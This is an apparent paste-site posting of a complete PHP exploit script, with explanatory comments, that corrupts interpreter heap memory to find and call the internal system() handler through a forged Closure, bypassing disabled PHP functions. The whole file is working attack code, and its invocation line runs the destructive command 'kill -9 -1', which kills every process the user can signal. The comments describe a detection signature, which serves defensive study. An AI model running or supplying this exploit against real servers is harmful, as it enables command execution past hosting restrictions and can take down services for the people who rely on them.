willysec_id

Bypass Kill System Process

Jan 4th, 2024
<?php
// Published exploit proof-of-concept. All of the work happens in the Pwn
// constructor below: it corrupts interpreter heap memory, scans that memory
// for the internal function-table entry named "system" rather than calling
// system() by name, and invokes it through a forged Closure with the command
// passed on the last line. For a defender, the shape below (opcache_reset()
// followed by a class of raw offsets, str_repeat()/str_shuffle() allocation
// loops and set_error_handler() callbacks that reassign the array being
// concatenated) is the recognisable signature of this family of scripts.
//
// opcache_reset() is part of the set-up; its exact role is not evident from
// this file alone.
opcache_reset();
// "kill -9 -1" sends SIGKILL to every process the invoking user may signal.
new Pwn("kill -9 -1");

  5. class Helper { public $a, $b, $c; }
/**
 * Proof-of-concept memory-corruption exploit against the PHP interpreter
 * (a defensive reading of what the code does, not an endorsement).
 *
 * Mechanics visible in this file:
 *  - heap_leak() and free() concatenate a string onto an array element, which
 *    raises the "Array to string conversion" notice; the installed error
 *    handler replaces that array and allocates a fresh buffer while the
 *    engine is still in the middle of the concatenation.
 *  - $this->abc is a string whose length field appears to be corrupted
 *    (the constructor checks for strlen($this->abc) >= 0x1337); byte writes
 *    into it (rel_write) and strlen() on the neighbouring Helper object's
 *    property $a (read) then serve as relative-write and absolute-read
 *    primitives.
 *  - get_basic_funcs()/get_system() walk interpreter data structures looking
 *    for the function-table entry named "system"; the constructor copies the
 *    real Closure stored in helper->b into abc, overwrites its handler with
 *    that address and calls helper->b with $cmd.
 *
 * Every offset below (0x60, 0x118, 0x18, 0x70/0x68, 0x138, 0x20-stride scans)
 * is tied to particular interpreter builds. When they do not match, the
 * script typically aborts at the "uaf failed" check, loops forever in
 * get_basic_funcs(), or crashes the worker. The properties abc and helper
 * are never declared on the class; they are created dynamically in the
 * constructor.
 */
class Pwn {
    // Toggles the printf() output in log(); off in the published copy.
    const LOGGING = false;
    // Payload size of the heap chunks the grooming strings are sized for.
    const CHUNK_DATA_SIZE = 0x60;
    // Debug builds carry extra per-chunk bookkeeping, hence the 0x20 extra.
    const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE;
    // 0x47 bytes: a string whose allocation (header + bytes + terminator)
    // fills a CHUNK_DATA_SIZE chunk. 0x18 presumably is the string header
    // size and 1 the NUL terminator -- confirm against the target build.
    const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1;

    // Second chunk class used for the HT_STRING_SIZE grooming strings and the
    // buffers allocated inside the error handlers.
    const HT_SIZE = 0x118;
    // 0xff bytes, sized by the same header/terminator arithmetic as above.
    const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1;

    /**
     * Runs the whole exploit chain; the command is executed before the
     * constructor returns. On the early-exit path ("uaf failed") the object
     * is left half-initialised (helper exists, nothing else was set up).
     *
     * @param string $cmd  command handed to the located system() handler
     */
    public function __construct($cmd) {
        // Heap grooming: ten pairs of strings in the two chunk classes.
        // $groom is never read again; presumably it only keeps the
        // allocations alive.
        for($i = 0; $i < 10; $i++) {
            $groom[] = self::alloc(self::STRING_SIZE);
            $groom[] = self::alloc(self::HT_STRING_SIZE);
        }
       
        // heap_leak() returns a buffer allocated while the engine was
        // mid-concatenation; the 8 bytes at offset 16 are interpreted as a
        // heap pointer (named after the concatenation string).
        $concat_str_addr = self::str2ptr($this->heap_leak(), 16);
        // $fill is never used afterwards; presumably it occupies the chunk
        // that sits between the leaked address and abc.
        $fill = self::alloc(self::STRING_SIZE);

        // abc is the string later abused as the read/write window. Its
        // address is *assumed* to be one chunk after the leaked pointer --
        // the chain relies on the allocator returning adjacent chunks.
        $this->abc = self::alloc(self::STRING_SIZE);
        $abc_addr = $concat_str_addr + self::CHUNK_SIZE;
        self::log("abc @ 0x%x", $abc_addr);

        // Release the chunk abc lives in while $this->abc still refers to it,
        // then allocate a Helper object so it lands in that memory (inferred
        // from the name and from read() using helper->a below).
        $this->free($abc_addr);
        $this->helper = new Helper;
        // If abc's length field was not clobbered, the corruption did not
        // take effect: bail out instead of touching memory blindly.
        if(strlen($this->abc) < 0x1337) {
            self::log("uaf failed");
            return;
        }

        // Populate the Helper: $a is what read() measures with strlen(),
        // $b is the Closure whose pointer is read back from abc at 0x20,
        // $c is an int marker.
        $this->helper->a = "leet";
        $this->helper->b = function($x) {};
        $this->helper->c = 0xfeedface;

        // Only logged; not used by the rest of the chain.
        $helper_handlers = $this->rel_read(0);
        self::log("helper handlers @ 0x%x", $helper_handlers);

        // Offset 0x20 of abc now yields the address of the Closure in $b
        // (it is swapped for a forged one, then restored, further down).
        $closure_addr = $this->rel_read(0x20);
        self::log("real closure @ 0x%x", $closure_addr);

        // Pointer at closure+0x10, labelled class_entry by the log message;
        // used as the starting point for the backwards scan below.
        $closure_ce = $this->read($closure_addr + 0x10);
        self::log("closure class_entry @ 0x%x", $closure_ce);
       
        $basic_funcs = $this->get_basic_funcs($closure_ce);
        self::log("basic_functions @ 0x%x", $basic_funcs);

        // Address of the handler registered for "system". Note get_system()
        // returns null if the table ends without a match; nothing checks that
        // here, so null would be written into the forged closure below.
        $zif_system = $this->get_system($basic_funcs);
        self::log("zif_system @ 0x%x", $zif_system);

        // Copy 0x138 bytes of the real Closure into abc starting at 0x70,
        // eight bytes at a time, producing a forged copy inside the window.
        $fake_closure_off = 0x70;
        for($i = 0; $i < 0x138; $i += 8) {
            $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i));
        }
        // 4-byte write of 1 at +0x38 of the copy; the field's meaning is not
        // evident from this file.
        $this->rel_write($fake_closure_off + 0x38, 1, 4);
        // Handler slot sits at a different offset on PHP 8 than on PHP 7.
        $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
        $this->rel_write($fake_closure_off + $handler_offset, $zif_system);

        // Absolute address of the copy: abc's address plus the offset within
        // abc plus 0x18 (the same header size used in the size constants).
        $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18;
        self::log("fake closure @ 0x%x", $fake_closure_addr);

        // Point helper->b at the forged Closure and call it: this is where
        // $cmd is executed.
        $this->rel_write(0x20, $fake_closure_addr);
        ($this->helper->b)($cmd);

        // Put the original Closure pointer back before unsetting $b,
        // presumably so that destruction releases the real object and not
        // the forged bytes inside abc.
        $this->rel_write(0x20, $closure_addr);
        unset($this->helper->b);
    }

    /**
     * Returns a HT_STRING_SIZE buffer allocated while the engine is inside
     * an array-to-string concatenation.
     *
     * `$arr[1] .= <string>` on an empty array raises the "Array to string
     * conversion" notice; the handler then replaces $arr with an int and
     * allocates $buf. Whatever the allocator places in $buf is what the
     * caller parses with str2ptr(). The handler is never removed (no
     * restore_error_handler()), so any later notice re-runs it -- and if the
     * notice never fires, $buf stays undefined and the caller indexes null.
     *
     * @return string|null
     */
    private function heap_leak() {
        $arr = [[], []];
        set_error_handler(function() use (&$arr, &$buf) {
            $arr = 1;
            $buf = str_repeat("\x00", self::HT_STRING_SIZE);
        });
        // STRING_SIZE minus strlen("Array"): the concatenation result
        // "Array" . <this> is sized to land in the STRING_SIZE chunk class.
        $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array"));
        return $buf;
    }

    /**
     * Same error-handler trick as heap_leak(), but the buffer allocated from
     * inside the handler is a copy of a crafted HT_STRING_SIZE payload:
     * three little-endian 64-bit words (two markers and $addr) padded with
     * "A". The constructor uses it to release the chunk at $addr; how the
     * payload achieves that is not evident from this file alone.
     *
     * @param int $addr  heap address the payload embeds as its third word
     */
    private function free($addr) {
        $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr);
        $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload));
       
        $arr = [[], []];
        set_error_handler(function() use (&$arr, &$buf, &$payload) {
            $arr = 1;
            // str_repeat(..., 1) produces a fresh copy of $payload rather than
            // reusing the existing string.
            $buf = str_repeat($payload, 1);
        });
        $arr[1] .= "x";
    }

    /**
     * Reads an 8-byte little-endian integer from $this->abc at $offset.
     * Only meaningful after abc's length has been corrupted; before that,
     * offsets beyond 0x46 would be out of range.
     *
     * @param int $offset
     * @return int
     */
    private function rel_read($offset) {
        return self::str2ptr($this->abc, $offset);
    }

    /**
     * Writes the low $n bytes of $value into $this->abc at $offset,
     * least-significant byte first, one character at a time.
     *
     * @param int $offset
     * @param int $value
     * @param int $n  number of bytes to write (default 8)
     */
    private function rel_write($offset, $value, $n = 8) {
        for ($i = 0; $i < $n; $i++) {
            $this->abc[$offset + $i] = chr($value & 0xff);
            $value >>= 8;
        }
    }

    /**
     * Absolute memory read via strlen().
     *
     * Writes $addr - 0x10 into abc at offset 0x10 and then returns
     * strlen($this->helper->a). The implied layout is that abc+0x10 overlaps
     * the pointer behind helper->a, so strlen() reports the 8 bytes found
     * at $addr (the -0x10 compensating for where the length field sits
     * relative to the pointer) -- inferred, confirm against the build.
     *
     * @param int $addr
     * @param int $n  result is masked to the low $n bytes when not 8
     * @return int
     */
    private function read($addr, $n = 8) {
        $this->rel_write(0x10, $addr - 0x10);
        $value = strlen($this->helper->a);
        // (1 << (n*8)) - 1: e.g. 0xffffffff for n = 4, 48-bit mask for n = 6.
        if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
        return $value;
    }

    /**
     * Walks 0x20-byte entries starting at $basic_funcs. Each entry's first
     * word points at a name; when the first 6 bytes of that name equal
     * 0x6d6574737973 -- the ASCII bytes "system" read little-endian -- the
     * entry's second word is returned (the handler address). The walk stops
     * when a null name pointer is reached, in which case the method falls
     * off the end and returns null.
     *
     * @param int $basic_funcs
     * @return int|null
     */
    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = $this->read($addr);
            $f_name = $this->read($f_entry, 6);
            if($f_name === 0x6d6574737973) {
                return $this->read($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry !== 0);
    }

    /**
     * Scans backwards from $addr in 0x10 steps for a structure whose first
     * 4-byte word is 0xA8 and whose next 4-byte word is one of the listed
     * numbers (these look like per-release module API numbers for PHP
     * 7.3-8.1 -- confirm). At a candidate, the pointer at +0x20 is followed
     * and 8 bytes there are compared with 0x647261646e617473, the ASCII
     * bytes "standard" read little-endian; on a match the pointer at +0x28
     * is returned.
     *
     * There is no upper bound on the scan: if no match exists, this loops
     * until a read touches unmapped memory and the process dies.
     *
     * @param int $addr
     * @return int
     */
    private function get_basic_funcs($addr) {
        while(true) {
            $addr -= 0x10;
            if($this->read($addr, 4) === 0xA8 &&
                in_array($this->read($addr + 4, 4),
                    [20180731, 20190902, 20200930, 20210902])) {
                $module_name_addr = $this->read($addr + 0x20);
                $module_name = $this->read($module_name_addr);
                if($module_name === 0x647261646e617473) {
                    self::log("standard module @ 0x%x", $addr);
                    return $this->read($addr + 0x28);
                }
            }
        }
    }

    /**
     * printf()-style debug output, active only when LOGGING is true.
     * Called via self:: from instance context throughout the class.
     *
     * @param string $format  printf format; a newline is appended
     * @param mixed  $val     single value substituted into $format
     */
    private function log($format, $val = "") {
        if(self::LOGGING) {
            printf("{$format}\n", $val);
        }
    }

    /**
     * Allocates a fresh string of $size 'A' bytes. Shuffling identical bytes
     * changes nothing visible; presumably it is there to force a new,
     * non-shared heap copy -- confirm.
     *
     * @param int $size
     * @return string
     */
    static function alloc($size) {
        return str_shuffle(str_repeat("A", $size));
    }

    /**
     * Reads $n bytes of $str starting at $p as an unsigned little-endian
     * integer (the last byte is shifted in first, so it becomes the most
     * significant).
     *
     * @param string $str
     * @param int    $p   byte offset to start at
     * @param int    $n   number of bytes to read (default 8)
     * @return int
     */
    static function str2ptr($str, $p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p + $j]);
        }
        return $address;
    }
}
  160. ?>